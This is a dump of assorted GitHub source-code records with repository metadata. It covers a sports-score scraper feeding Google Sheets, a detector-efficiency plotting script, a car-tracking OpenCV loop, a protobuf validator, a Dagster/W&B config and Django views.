QApplication(sys.argv)\nwin = Window()\nsys.exit(app.exec_())\n", "repo_name": "Saad-001/learning-python-with-problem-solving", "sub_path": "week_3/module_10_lab_class_3/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtGui.QIcon", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 71, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 75, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_RGB888", "line_number": 75, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 76, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 76, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "22213329995", "text": "import pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nimport re\r\nimport gspread\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport time\r\n\r\ndef findBlockHeight(soup):\r\n height = soup.find('div', attrs={'class': 'ReactVirtualized__Grid__innerScrollContainer'})\r\n try:\r\n b = re.split(': |;', str(height['style']))\r\n l = b[b.index(' max-height') + 1]\r\n except:\r\n return 0\r\n return round(float(l[:len(l)-2])+800)\r\n\r\ndef findMatchesArray(h,a):\r\n array=[]\r\n while (h <= a):\r\n driver.execute_script(f\"window.scrollTo(0, {h});\")\r\n time.sleep(1)\r\n data = driver.page_source\r\n soup = BeautifulSoup(data, \"html.parser\")\r\n h += 800\r\n t = soup.find_all('a', attrs={'data-id': True})\r\n try:\r\n for i in t:\r\n tteams = i.find('div', attrs={\"class\": \"sc-hLBbgP eIlfTT\"})\r\n line = str()\r\n for elem in tteams:\r\n # print(elem.text.strip())\r\n line += elem.text.strip() + \":\"\r\n score = i.find_all('div',\r\n attrs={'class': \"sc-hLBbgP sc-eDvSVe fuUKnP bMwHQt sc-9199a964-2 kgwLqG score-box\"})\r\n if score != []:\r\n line += score[0].text[0] + '/' + score[1].text[0] + \":\"\r\n live = i.find('div', attrs={'color': 'sofaSingles.live'})\r\n if live != None:\r\n line += 'live'\r\n if line not in array:\r\n array.append(line)\r\n except:\r\n z = 0\r\n return array\r\n\r\n# Connect to Google Sheets\r\nscope = ['https://www.googleapis.com/auth/spreadsheets',\r\n \"https://www.googleapis.com/auth/drive\"]\r\n\r\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\"sofascore-parser.json\", scope)\r\nclient = gspread.authorize(credentials)\r\ngoogle_sh = client.create(\"Parser\")\r\ngoogle_sh.share('muradrmagomedov@gmail.com', perm_type='user', role='writer')\r\n\r\ndriver = webdriver.Chrome()\r\ndriver.get(\"https://www.sofascore.com/\")\r\ndata = driver.page_source\r\nsoup = BeautifulSoup(data, \"html.parser\")\r\nallmatches=[]\r\n#=======Find-all-urls-of sports=========================================================\r\nurls=[]\r\nx=[]\r\np=soup.find('div',attrs={'class':'sc-hLBbgP dRtNhU sc-12472a74-0 ijBjmq'}).find_all('a')\r\nfor elem in p:\r\n uurl='https://www.sofascore.com'+elem['href']\r\n if uurl not in urls and uurl!='https://www.sofascore.com/motorsport':\r\n urls.append(uurl)\r\n#=======end============================================================================\r\n#========Iterating through urls =======================================================\r\nfor elem in urls:\r\n driver.get(elem)\r\n time.sleep(1)\r\n data = driver.page_source\r\n soup = BeautifulSoup(data, \"html.parser\")\r\n#=======Find-matches-block-height=====================================================\r\n a = findBlockHeight(soup)\r\n h = 0\r\n#======================================================================================\r\n#========Iterating through page========================================================\r\n allmatches.append(findMatchesArray(h,a))\r\n\r\nfor i in range(len(allmatches)):\r\n for j in range(len(allmatches[i])):\r\n x.append(allmatches[i][j].split(':'))\r\n name=urls[i].split('/')[-1]\r\n if name=='':\r\n name='football'\r\n sheet=google_sh.add_worksheet(title=f'{name}',rows=1000,cols=4)\r\n df=pd.DataFrame(x)\r\n sheet.update(x)\r\n x = []\r\ngoogle_sh.del_worksheet(worksheet='Sheet1')\r\ndriver.close()\r\n", "repo_name": "aagadg/sofascore-parser", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.split", "line_number": 12, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 51, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 51, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 52, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 56, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 56, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 59, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "29702069407", "text": "import csv\r\nimport os\r\nimport math\r\nfrom datetime import datetime\r\nimport string\r\nimport numpy as np\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import linregress\r\n\r\n\r\n#creates a list of all the csv files in the directory excluding the template\r\ncsvfiles = [os.path.join(root, name) for root, dirs, files in os.walk(\"./\") for name in files if name.endswith((\".csv\")) and name[-12:] != \"template.csv\"]\r\n\r\n\r\n#creates a dictionary associating each file with a list of its data\r\ndata = {}\r\nfor file in csvfiles:\r\n data[file] = []\r\n with open(file, 'rb') as csvfile:\r\n spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\r\n for row in spamreader:\r\n data[file].append(row[0])\r\n for i in range(1,7):\r\n data[file][i] = int(data[file][i])\r\n for i in range(7,16):\r\n data[file][i] = float(filter(lambda x: x in string.printable, data[file][i]))\r\n\r\n\r\n#combines the data into a dictionary keyed with names representing a chart\r\n# with a value as a list of lists of the data for a particular graph\r\ncharts = {}\r\nfor item in data:\r\n if data[item][16] not in charts:\r\n charts[data[item][16]] = [data[item]]\r\n else:\r\n charts[data[item][16]].append(data[item])\r\n\r\n\r\n# processes the data and calculations outputting tuples (pairs) of results to plot\r\ndatatoplot = {}\r\nfor date in charts:\r\n datatoplot[date] = []\r\n #memoize some of the processing\r\n processed = {}\r\n def findexpectation(setofdata,processed):\r\n activity = setofdata[7] * math.e ** (-math.log(2) * time / setofdata[8])\r\n s = setofdata[11]\r\n r = setofdata[12]\r\n solidangle = s ** 2 / (4 * math.pi * r ** 2)\r\n expec = 37000 * activity * setofdata[10] * setofdata[13] * solidangle\r\n processed[(time, setofdata[10], setofdata[13], setofdata[11], setofdata[12])] = expec\r\n return expec\r\n\r\n for setofdata in charts[date]:\r\n end = datetime(setofdata[4], setofdata[5], setofdata[6])\r\n start = datetime(setofdata[1], setofdata[2], setofdata[3])\r\n difference = end - start\r\n time = (difference.days + difference.seconds / 86400) / 365.2425\r\n energy = setofdata[9]\r\n #check memoized data\r\n if (time, setofdata[10], setofdata[13], setofdata[11], setofdata[12]) in processed:\r\n expectation = processed[(time, setofdata[10], setofdata[13], setofdata[11], setofdata[12])]\r\n #in case not already calculated, then calculate\r\n else:\r\n expectation = findexpectation(setofdata, processed)\r\n experimental = setofdata[14]\r\n efficiency = experimental / expectation\r\n datatoplot[date].append((energy, efficiency))\r\n\r\n\r\n\r\n#outputs data and graphs onto a pdf\r\nwith PdfPages('data.pdf') as pdf:\r\n plotting = sorted(datatoplot)\r\n\r\n for i in range(len(datatoplot)):\r\n x = []\r\n y = []\r\n for tup in datatoplot[plotting[i]]:\r\n x.append(tup[0])\r\n y.append(tup[1])\r\n\r\n # make the scatter plot\r\n plt.scatter(x, y, s=10, alpha=.5, marker='o')\r\n # determine best fit line\r\n par = np.polyfit(x, y, 1, full=True)\r\n slope=par[0][0]\r\n intercept=par[0][1]\r\n xl = [min(x), max(x)]\r\n yl = [slope*xx + intercept for xx in xl]\r\n plt.plot(xl, yl, '-r')\r\n\r\n #analyze data\r\n slope, intercept, rcorrelation, pcorrelation, stderr = linregress(x, y)\r\n #output y=mx+b and r^2 onto graph pdf\r\n plt.text(0, .95, \"y = \" + str(slope) + \"x + \" + str(intercept) + \", r squared = \" + str(rcorrelation))\r\n\r\n #output data points as text (ordered pairs) onto graph\r\n texts = {}\r\n for j in range(len(datatoplot[plotting[i]])):\r\n plt.text(0, .85 - j*.1 , datatoplot[plotting[i]][j])\r\n\r\n #label axes\r\n plt.xlabel('energy')\r\n plt.ylabel('efficiency')\r\n \r\n #set limits of x and y axes\r\n plt.ylim([0, 1])\r\n plt.xlim([0, 1400])\r\n\r\n #plot title\r\n plt.title(str(plotting[i]))\r\n\r\n pdf.savefig() # saves the current figure into a pdf page\r\n plt.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "meiaalsup/urop-detector-efficiency", "sub_path": "ProcessEnergies.py", "file_name": "ProcessEnergies.py", "file_ext": "py", "file_size_in_byte": 4218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 13, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 21, "usage_type": "call"}, {"api_name": "string.printable", "line_number": 27, "usage_type": "attribute"}, {"api_name": "math.e", "line_number": 47, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 47, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 50, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "scipy.stats.linregress", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "18541708704", "text": "from datetime import datetime\nfrom dateutil import tz\nfrom shared.settings import TIMEZONE\n\ndef timezone_recovery(dt:datetime,timezone:str='') -> datetime:\n '''\n MongoDBから取得したISODate型はタイムゾーンが抜け落ちている。\n それの補正とタイムゾーンの付与を行ったdatetime型を返す。\n MongoDBから取得したISODate型の項目を使う場合、基本的に当関数を通じて使用すること。\n '''\n if timezone == '':\n UTC = tz.gettz(\"UTC\")\n dt = dt.replace(tzinfo=UTC)\n dt = dt.astimezone(TIMEZONE)\n else:\n UTC = tz.gettz(\"UTC\")\n dt = dt.replace(tzinfo=UTC)\n _ = tz.gettz(timezone)\n dt = dt.astimezone(_)\n return dt", "repo_name": "pubranko/BrownieAtelier", "sub_path": "app/shared/timezone_recovery.py", "file_name": "timezone_recovery.py", "file_ext": "py", "file_size_in_byte": 742, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime", "line_number": 5, "usage_type": "name"}, {"api_name": "dateutil.tz.gettz", "line_number": 12, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 12, "usage_type": "name"}, {"api_name": "shared.settings.TIMEZONE", "line_number": 14, "usage_type": "argument"}, {"api_name": "dateutil.tz.gettz", "line_number": 16, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 16, "usage_type": "name"}, {"api_name": "dateutil.tz.gettz", "line_number": 18, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "21066190205", "text": "import numpy as np\r\nimport cv2\r\nimport time\r\n\r\n\r\ndef foofunction(x, y):\r\n a = []\r\n b = []\r\n c = []\r\n for i in range(0, len(x)):\r\n state = False\r\n for j in range(0, len(y)):\r\n if np.all(x[i] == y[j]):\r\n b.append(x[i])\r\n state = True\r\n if not state:\r\n a.append(x[i])\r\n\r\n for i in range(0, len(y)):\r\n state = False\r\n for j in range(0, len(x)):\r\n if np.all(x[j] == y[i]):\r\n state = True\r\n break\r\n if not state:\r\n c.append(y[i])\r\n return a, b, c\r\n\r\n\r\ndef labelformat(a):\r\n a = str(a)\r\n for i in range(len(a), 4):\r\n a = \"0\"+a\r\n return a\r\n\r\n\r\ncar_cascade = cv2.CascadeClassifier('haar_car.xml')\r\ninit = False\r\ncar_dataset = []\r\nframe_counter = 1\r\n\r\nfor i in range(1, 1701):\r\n img = cv2.imread(\"highway\\\\input\\\\in00\"+labelformat(i)+\".jpg\")\r\n car_dataset.append(img)\r\n\r\nall_cars = []\r\nid_vehicle = 1\r\n\r\nfor img in car_dataset:\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n cars = car_cascade.detectMultiScale(gray, 1.1, 5)\r\n new_cars = []\r\n # read new detected objects\r\n for (x, y, w, h) in cars:\r\n new_cars.append(detected_object(x, y, w, h, \"Vehicle TBD\"))\r\n\r\n for element in range(len(all_cars)):\r\n all_cars[element].draw = False\r\n\r\n if not init and len(cars) > 0:\r\n for element in new_cars:\r\n element.label = str(id_vehicle)\r\n id_vehicle += 1\r\n all_cars = new_cars.copy()\r\n init = True\r\n\r\n elif init:\r\n # delete elements with no TTL left and decrements TTL\r\n for element in range(len(all_cars)):\r\n # todel = []\r\n if all_cars[element].TTL <= 0:\r\n all_cars[element].draw = False\r\n else:\r\n all_cars[element].TTL -= 1\r\n all_cars[element].draw = False\r\n # Determin object correspendence\r\n # compute xxo as [a,b] where a is the index of the new object in new_cars and o is the index of the object in all_cars\r\n if init and len(new_cars) > 0:\r\n xxo = []\r\n for new_element in range(len(new_cars)):\r\n distance = []\r\n distance_indexes = []\r\n for old_element in range(len(all_cars)):\r\n distance.append(new_cars[new_element].distance(\r\n all_cars[old_element]))\r\n distance_indexes.append([new_element, old_element])\r\n xxo.append(distance_indexes[np.argmin(distance)])\r\n # Same thing as precedent , but this time we inverse the loop\r\n oxo = []\r\n for old_element in range(len(all_cars)):\r\n distance = []\r\n distance_indexes = []\r\n for new_element in range(len(new_cars)):\r\n distance.append(all_cars[old_element].distance(\r\n new_cars[new_element]))\r\n distance_indexes.append([new_element, old_element])\r\n oxo.append(distance_indexes[np.argmin(distance)])\r\n # now we search for the intersection of xxo and oxo :\r\n # 1- if an element is common , the we update it's position in all_cars\r\n # 2 - if an element belongs only to xxo , then it's a new element\r\n # 3 - if an element belongs onlt to oxo , then we don't render it\r\n only_x, common, only_o = foofunction(xxo, oxo)\r\n # case 1 :\r\n for common_element in common:\r\n all_cars[common_element[1]].TTL = 5\r\n all_cars[common_element[1]].x = new_cars[common_element[0]].x\r\n all_cars[common_element[1]].y = new_cars[common_element[0]].y\r\n all_cars[common_element[1]\r\n ].centroid = new_cars[common_element[0]].centroid\r\n all_cars[common_element[1]].draw = True\r\n # case 2 :\r\n for only_x_element in only_x:\r\n new_cars[only_x_element[0]].label = str(id_vehicle)\r\n new_cars[only_x_element[0]].draw = True\r\n id_vehicle += 1\r\n all_cars = list(all_cars)\r\n all_cars.append(new_cars[only_x_element[0]])\r\n # case 3 :\r\n for only_o_element in only_o:\r\n all_cars[only_o_element[1]].x = 9999\r\n all_cars[only_o_element[1]].y = 9999\r\n all_cars[only_o_element[1]].centroid = (9999, 9999)\r\n all_cars[only_o_element[1]].draw = False\r\n\r\n showdown = all_cars\r\n for element in showdown:\r\n element.history.append(element.centroid)\r\n print(element.history)\r\n if element.draw:\r\n startpoint = element.history[0]\r\n endpoint = element.history[-1]\r\n vector = (endpoint[0]-startpoint[0], endpoint[1]-startpoint[1])\r\n enddraw = (element.centroid[0]+vector[0],\r\n element.centroid[1]+vector[1])\r\n cv2.rectangle(img, (element.x, element.y), (element.x +\r\n element.w, element.y+element.h), (0, 0, 255), 2)\r\n cv2.putText(img, element.label, (element.x, element.y+element.h+50),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)\r\n try:\r\n cv2.arrowedLine(img, element.centroid, enddraw, (255, 0, 0), 2)\r\n except:\r\n pass\r\n for i in element.history:\r\n cv2.circle(img, i, 2, (0, 255, 255), -1)\r\n cv2.imshow(\"CAR TRACKING\", img)\r\n time.sleep(0.01)\r\n frame_counter += 1\r\n # Stop if 'q' key is pressed\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n", "repo_name": "nazimbandoui/car_tracking", "sub_path": "track.py", "file_name": "track.py", "file_ext": "py", "file_size_in_byte": 5552, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.all", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 50, "usage_type": "attribute"}, {"api_name": "numpy.argmin", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 97, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 138, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 138, "usage_type": "attribute"}, {"api_name": "cv2.arrowedLine", "line_number": 140, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 145, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "37864710275", "text": "import base64\nimport math\nfrom importlib import import_module\n\nfrom google.protobuf import descriptor\nfrom google.protobuf.json_format import (_FLOAT_TYPES, _INFINITY, _INT64_TYPES,\n _NAN, _NEG_INFINITY, Parse)\n\n\ndef validate_protobuf(dataset_path, message):\n \"\"\"Check if a protobuf file is DGP compliant. Throws exceptions if invalid.\n\n Parameters\n ----------\n dataset_path: string\n Path to the dataset file (.json) to be validated.\n message: string\n Target message name to be validated (dgp.proto.dataset.Dataset).\n \"\"\"\n modules = message.split('.')\n assert len(modules) >= 4, '{} needs to be at least 4-tuple valued'.format(message)\n try:\n top_module = modules[0]\n proto, message_name = modules[-2], modules[-1]\n compiled_proto_module = '{}_pb2'.format(proto)\n module_object = import_module(\"{}.{}\".format('.'.join(modules[:-2]), compiled_proto_module))\n target_message = getattr(module_object, message_name)\n except Exception as e:\n raise ValueError('Failed to parse {} proto message: {}'.format(message, e.message))\n\n if not dataset_path.endswith((\".json\", \".pb\", \".prb\")):\n raise IOError(\"{} is not a supported file format. Supported file extenstions: .json, .pb, .prb\")\n\n is_json = dataset_path.endswith(\".json\")\n with open(dataset_path, \"r\" if is_json else \"rb\") as dataset_file:\n if is_json:\n message = Parse(dataset_file.read(), target_message())\n else:\n message = target_message()\n target_message().ParseFromString(dataset_file.read())\n\n schema = getattr('{}.validation', top_module, 'SCHEMA_VALIDATION')\n validate_message(message, schema)\n\n print(\"{} is valid\".format(dataset_path))\n\n\ndef validate_message(message, schema):\n \"\"\"Validate a protobuf message instance. Throws exception if a field value does not match the schema.\n Parameters\n ----------\n message: protobuf message instance\n The protocol buffers message instance to be validated.\n schema: dict\n A dictionary containing field names to NamedTuples of content schema.\n \"\"\"\n for field, value in message.ListFields():\n if _is_map_entry(field):\n v_field = field.message_type.fields_by_name['value']\n for key in value:\n _validate_field(v_field, value[key], schema)\n elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:\n for v in value:\n _validate_field(field, v, schema)\n else:\n _validate_field(field, value, schema)\n\n\ndef _is_map_entry(field):\n \"\"\"Returns True if the field is a map entry, vice versa.\n Parameters\n ----------\n field: FieldDescriptor\n Field.\n\n Returns\n -------\n exists: bool\n True if the filed is a map entry.\n \"\"\"\n return (\n field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and field.message_type.has_options\n and field.message_type.GetOptions().map_entry\n )\n\n\ndef _validate_content(full_name, content, name_to_schema):\n \"\"\"Validate a single field content if the field name is in the auxiliary schema.\n Parameters\n ----------\n full_name: str\n Full name of the field.\n content: Any\n Field value.\n \"\"\"\n if full_name in name_to_schema:\n schema = name_to_schema[full_name]\n schema.validate(full_name, content)\n\n\ndef _validate_field(field, value, schema):\n \"\"\"Traverse fields, convert field value and call _validate_content to check\n if contents satisfy the auxiliary schema.\n Parameters\n ----------\n field: FieldDescriptor\n Field.\n value: Any\n Value.\n schema: Dict\n Auxiliary content schema imported from dgp.proto.auxiliary_schema\n \"\"\"\n if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:\n return validate_message(value, schema)\n\n field_value = value\n if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:\n enum_value = field.enum_type.values_by_number.get(value, None)\n if enum_value is not None:\n field_value = enum_value.name\n elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:\n if field.type == descriptor.FieldDescriptor.TYPE_BYTES:\n field_value = base64.b64encode(value).decode('utf-8')\n else:\n field_value = value\n elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:\n field_value = bool(value)\n elif field.cpp_type in _INT64_TYPES:\n field_value = str(value)\n elif field.cpp_type in _FLOAT_TYPES:\n if math.isinf(value):\n field_value = _NEG_INFINITY if value < 0.0 else _INFINITY\n if math.isnan(value):\n field_value = _NAN\n\n _validate_content(field.full_name, field_value, schema)\n", "repo_name": "morsingher/sfm_to_mvs", "sub_path": "ddad/dgp/utils/validator.py", "file_name": "validator.py", "file_ext": "py", "file_size_in_byte": 4862, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "importlib.import_module", "line_number": 26, "usage_type": "call"}, {"api_name": "google.protobuf.json_format.Parse", "line_number": 37, "usage_type": "call"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 62, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 62, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 82, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 82, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 113, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 113, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 117, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 117, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 121, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 121, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 122, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 122, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 123, "usage_type": "call"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 126, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 126, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._INT64_TYPES", "line_number": 128, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._FLOAT_TYPES", "line_number": 130, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 131, "usage_type": "call"}, {"api_name": "google.protobuf.json_format._NEG_INFINITY", "line_number": 132, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._INFINITY", "line_number": 132, "usage_type": "name"}, {"api_name": "math.isnan", "line_number": 133, "usage_type": "call"}, {"api_name": "google.protobuf.json_format._NAN", "line_number": 134, "usage_type": "name"}]} +{"seq_id": "9881877677", "text": "from dagster import (\n Definitions,\n StringSource,\n load_assets_from_package_module,\n make_values_resource,\n)\nfrom dagster_wandb import wandb_artifacts_io_manager, wandb_resource\n\nfrom . import assets\nfrom .ops.launch.run_launch_agent import run_launch_agent_example\nfrom .ops.launch.run_launch_job import run_launch_job_example\nfrom .ops.partitioned_job import partitioned_job_example\nfrom .ops.simple_job import simple_job_example\n\nwandb_config = make_values_resource(\n entity=StringSource,\n project=StringSource,\n)\n\ndefs = Definitions(\n assets=load_assets_from_package_module(assets),\n jobs=[\n simple_job_example,\n partitioned_job_example,\n run_launch_agent_example,\n run_launch_job_example,\n ],\n resources={\n \"wandb_config\": wandb_config.configured(\n {\n \"entity\": {\"env\": \"WANDB_ENTITY\"},\n \"project\": {\"env\": \"WANDB_PROJECT\"},\n }\n ),\n \"wandb_resource\": wandb_resource.configured({\"api_key\": {\"env\": \"WANDB_API_KEY\"}}),\n \"io_manager\": wandb_artifacts_io_manager.configured({\"cache_duration_in_minutes\": 60}),\n },\n)\n", "repo_name": "dagster-io/dagster", "sub_path": "examples/with_wandb/with_wandb/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1159, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8986, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dagster.make_values_resource", "line_number": 15, "usage_type": "call"}, {"api_name": "dagster.StringSource", "line_number": 16, "usage_type": "name"}, {"api_name": "dagster.StringSource", "line_number": 17, "usage_type": "name"}, {"api_name": "dagster.Definitions", "line_number": 20, "usage_type": "call"}, {"api_name": "dagster.load_assets_from_package_module", "line_number": 21, "usage_type": "call"}, {"api_name": "ops.simple_job.simple_job_example", "line_number": 23, "usage_type": "name"}, {"api_name": "ops.partitioned_job.partitioned_job_example", "line_number": 24, "usage_type": "name"}, {"api_name": "ops.launch.run_launch_agent.run_launch_agent_example", "line_number": 25, "usage_type": "name"}, {"api_name": "ops.launch.run_launch_job.run_launch_job_example", "line_number": 26, "usage_type": "name"}, {"api_name": "dagster_wandb.wandb_resource.configured", "line_number": 35, "usage_type": "call"}, {"api_name": "dagster_wandb.wandb_resource", "line_number": 35, "usage_type": "name"}, {"api_name": "dagster_wandb.wandb_artifacts_io_manager.configured", "line_number": 36, "usage_type": "call"}, {"api_name": "dagster_wandb.wandb_artifacts_io_manager", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "14206480497", "text": "#encoding=utf-8\n\nfrom django.shortcuts import render\nfrom blogs.models import Tag, Category, BaseModel\nfrom common.helpers import paged_items, ok_json\nfrom common.pc_m import judge_pc_or_mobile\nfrom tools.models import Tools\n\n\ndef tools(request):\n nav_bar = \"tools\"\n tools_list = Tools.objects.filter(is_active=True).order_by(\"-id\")\n user_agt = judge_pc_or_mobile(request.META.get(\"HTTP_USER_AGENT\"))\n if user_agt is False:\n tools_list = paged_items(request, tools_list)\n return render(request, 'web/pages/tools/tools.html', locals())\n else:\n tools_list = paged_items(request, tools_list)\n return render(request, 'web/pages/tools/tools.html', locals())\n\n\ndef tools_detail(request, tid):\n nav_bar = \"tools\"\n tool_detail = Tools.objects.filter(id=tid).first()\n tool_detail.views += 1\n tool_detail.save()\n user_agt = judge_pc_or_mobile(request.META.get(\"HTTP_USER_AGENT\"))\n if user_agt is False:\n return render(request, 'web/pages/tools/tools_detail.html', locals())\n else:\n return render(request, 'web/pages/tools/tools_detail.html', locals())", "repo_name": "gingernet/scoinfamily", 